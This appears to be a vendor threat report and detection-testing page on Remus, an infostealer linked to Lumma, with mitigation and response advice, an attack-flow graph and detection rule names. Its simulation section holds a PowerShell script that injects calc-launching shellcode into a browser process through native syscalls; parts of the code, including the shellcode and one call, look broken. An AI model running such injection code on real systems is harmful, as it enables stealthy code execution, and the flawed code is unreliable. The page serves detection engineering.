Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Gen Threat Labs identified Remus, a new 64-bit infostealer that appears to be a direct successor to the Lumma Stealer lineage. It mirrors Lumma tradecraft, including familiar string obfuscation, anti-VM logic, direct-syscall execution, and a distinctive application-bound encryption (ABE) bypass previously associated with Lumma. Remus also shifts its C2 resolution model: instead of relying on Steam and Telegram dead-drop resolvers, it adopts EtherHiding, using Ethereum smart contracts to determine command-and-control endpoints. Observed since February 2026, the campaign focuses on browser-centric theft, targeting credentials, cookies, and cryptocurrency wallet data.
Investigation
Analysts compared Remus samples to historical Lumma binaries and found overlapping implementation details, including matching code constructs, shared wildcard-style strings, and the same ABE bypass approach. Transitional builds labeled “Tenzor” were observed as a bridge between the two families. Reverse engineering shows Remus locating dpapi.dll, hashing exported API names, and attempting shellcode injection into Chrome. If injection fails, it falls back to SYSTEM token impersonation to regain execution leverage. Newer anti-analysis additions include sandbox DLL hash checks and a “honeypot” PST file presence test intended to detect analysis environments.
Mitigation
Block known Remus-related C2 IPs/domains at the perimeter and monitor for EtherHiding behavior, including unusual lookups or traffic patterns consistent with smart-contract-based C2 resolution. On endpoints, prioritize detections for direct syscall usage, API hashing, and artifacts consistent with stealth execution (including hidden desktop creation). Reduce browser exposure by hardening Chromium-based environments where feasible, and enforce strict application control to prevent unauthorized code injection and suspicious unsigned executables from running.
Response
If Remus indicators are observed, isolate the host, capture memory dumps and full process trees, and perform focused forensics on injected browser processes. Block all confirmed C2 infrastructure, revoke exposed credentials, and reset stored browser passwords/tokens. Update detections to include the wildcard string B9%????4rnO/@NQe?Nx* and the reported 51-byte shellcode signature.
"graph TB %% Class Definitions classDef malware fill:#ff9999 classDef technique fill:#99ccff classDef process fill:#ffcc99 classDef action fill:#c2f0c2 %% Nodes malware_remus["<b>Malware</b> – Remus<br/><b>Description</b>: Modular banking Trojan capable of antiu2011analysis, reflective loading, and credential theft"] class malware_remus malware tech_anti_analysis["<b>Technique</b> – T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks<br/><b>Description</b>: Detects hypervisor vendor strings and known analysis DLLs; aborts if sandbox detected"] class tech_anti_analysis technique c2_resolve["<b>Action</b> – C2 Resolve<br/><b>Description</b>: Determines commandu2011andu2011control server address before further activity"] class c2_resolve action tech_unpacking["<b>Technique</b> – T1027.002 Obfuscated Files or Information: Software Packing<br/><b>Description</b>: Binary is packed, uses custom string obfuscation, indirect jumps and direct syscalls to hinder static analysis"] class tech_unpacking technique tech_reflective_load["<b>Technique</b> – T1620 Reflective Code Loading<br/><b>Description</b>: Injects a 51u2011byte shellcode payload into a Chromium/Chrome process for inu2011memory decryption"] class tech_reflective_load technique process_chrome["<b>Process</b> – Chromium/Chrome<br/><b>Description</b>: Target browser process that receives injected shellcode"] class process_chrome process tech_browser_cred["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/><b>Description</b>: Locates Chromium v20_master_key in memory, decrypts it, and extracts saved passwords, cookies and other credentials"] class tech_browser_cred technique tech_general_cred["<b>Technique</b> – T1555 Credentials from Password Stores<br/><b>Description</b>: Packages extracted browser data and any other stored credentials for exfiltration"] class tech_general_cred technique action_exfiltration["<b>Action</b> – Exfiltration<br/><b>Description</b>: Sends harvested credentials and data to the attackeru2019s C2 server"] class action_exfiltration action %% Connections malware_remus –>|performs| tech_anti_analysis tech_anti_analysis –>|proceeds to| c2_resolve c2_resolve –>|loads| tech_unpacking tech_unpacking –>|uses| tech_reflective_load tech_reflective_load –>|injects into| process_chrome process_chrome –>|enables| tech_browser_cred tech_browser_cred –>|generates| tech_general_cred tech_general_cred –>|leads to| action_exfiltration "
Attack Flow
Detections
Steam Communtiy DNS Request Perfomed By Suspicious Process (via dns_query)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
IOCs (HashSha256) to detect: Remus: Unmasking The 64-bit Variant of the Infamous Lumma Stealer
View
IOCs (HashSha1) to detect: Remus: Unmasking The 64-bit Variant of the Infamous Lumma Stealer
View
Remus ABE Bypass Technique Detection [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Process Selection: Identify a running instance of
browser.exe(renamed Chrome) and obtain its PID. - Shellcode Preparation: Create a small “calc.exe” launch shellcode (typical for proof‑of‑concept).
- Memory Allocation: Call NtAllocateVirtualMemory in the context of the target process to reserve a RWX region.
- Shellcode Injection: Use NtWriteVirtualMemory to copy the shellcode into the allocated region.
- Execution: Spawn a remote thread with NtCreateThreadEx that starts execution at the injected shellcode address.
- Process Selection: Identify a running instance of
-
Regression Test Script:
# Remus‑ABE simulation – PowerShell implementation using native NT‑syscalls # Requires running as Administrator Add-Type -Namespace Win32 -Name NativeMethods -MemberDefinition @" using System; using System.Runtime.InteropServices; public class NativeMethods { [DllImport("ntdll.dll", SetLastError = true)] public static extern UInt32 NtAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, ref UIntPtr RegionSize, UInt32 AllocationType, UInt32 Protect); [DllImport("ntdll.dll", SetLastError = true)] public static extern UInt32 NtWriteVirtualMemory( IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 BufferLength, out UInt32 BytesWritten); [DllImport("ntdll.dll", SetLastError = true)] public static extern UInt32 NtCreateThreadEx( out IntPtr ThreadHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr StartAddress, IntPtr Parameter, UInt32 CreateSuspended, UInt32 StackZeroBits, UInt32 SizeOfStackCommit, UInt32 SizeOfStackReserve, IntPtr AttributeList); } "@ # 1️⃣ Identify target browser.exe process $target = Get-Process -Name browser -ErrorAction Stop $hProcess = $target.Handle # 2️⃣ Shellcode – launch calc.exe (Windows x64) $shellcode = [Byte[]]( 0x48,0x31,0xC0, # xor rax,rax 0x48,0x89,0xC2, # mov rdx,rax 0x48,0x89,0xC6, # mov rsi,rax 0x48,0x89,0xC7, # mov rdi,rax 0x48,0x8D,0x15,0x0F,0x00,0x00,0x00, # lea rdx,[rip+0xf] ; "calc.exe" 0x48,0xC7,0xC0,0xC7,0x00,0x00,0x00, # mov rax,0xc7 (WinExec) 0xFF,0xD0, # call rax 0xC3, # ret # "calc.exe" string 0x63,0x61,0x6C,0x63,0x2E,0x65,0x78,0x65,0x00 ) # 3️⃣ Allocate RWX memory in target $baseAddress = [IntPtr]::Zero $regionSize = [UIntPtr]$shellcode.Length $allocResult = [Win32.NativeMethods]::NtAllocateVirtualMemory( $hProcess, [ref]$baseAddress, [UIntPtr]0, [ref]$regionSize, 0x3000, # MEM_COMMIT|MEM_RESERVE 0x40 # PAGE_EXECUTE_READWRITE ) if ($allocResult -ne 0) { Write-Error "NtAllocateVirtualMemory failed: 0x$($allocResult.ToString('X'))" } # 4️⃣ Write shellcode $bytesWritten = 0 $writeResult = [Win32.NativeMethods]::NtWriteVirtualMemory( $hProcess, $baseAddress, $shellcode, $shellcode.Length, [ref]$bytesWritten ) if ($writeResult -ne 0) { Write-Error "NtWriteVirtualMemory failed: 0x$($writeResult.ToString('X'))" } # 5️⃣ Create remote thread $hThread = [IntPtr]::Zero $createResult = [Win32.NativeMethods]::NtCreateThreadEx( [ref]$hThread, 0x1F03FF, # THREAD_ALL_ACCESS $hProcess, $baseAddress, 0, # not suspended 0,0,0, ) if ($createResult -ne 0) { Write-Error "NtCreateThreadEx failed: 0x$($createResult.ToString('X'))" } else { Write-Host "Shellcode injection successful – remote thread started (Handle: $hThread)" } -
Cleanup Commands:
# Terminate the injected thread (if still running) and free allocated memory $proc = Get-Process -Name browser -ErrorAction SilentlyContinue if ($proc) { $hProcess = $proc.Handle # Close thread handle if ($hThread -ne [IntPtr]::Zero) { [System.Runtime.InteropServices.Marshal]::Release($hThread) | Out-Null } # Free memory (NtFreeVirtualMemory) $freeAddr = $baseAddress $regionSize = [UIntPtr]$shellcode.Length $null = [Win32.NativeMethods]::NtFreeVirtualMemory($hProcess, [ref]$freeAddr, [ref]$regionSize, 0x8000) # MEM_RELEASE } Write-Host "Cleanup completed."
Recommendations Summary
- Broaden Process Scope: Include other high‑value processes (e.g.,
explorer.exe,svchost.exe) to catch ABE attempts that avoid the exact browser.exe name. - Expand Syscall Coverage: Add
NtMapViewOfSection,NtCreateSection, andNtProtectVirtualMemoryto theSyscall|containslist. - Behavioral Anomaly Detection: Correlate large‑size memory allocations (
RegionSize > 1 MB) with subsequentNtWriteVirtualMemoryin the same process to flag atypical injection patterns. - Whitelist Known Legitimate Scenarios: Create an allow‑list for browsers that legitimately perform in‑process memory writes (e.g., via plugins) to reduce false positives.
Implementing these hardening steps will increase the rule’s resilience from a 3 to a 4‑5 rating, making it substantially more difficult for adversaries to bypass.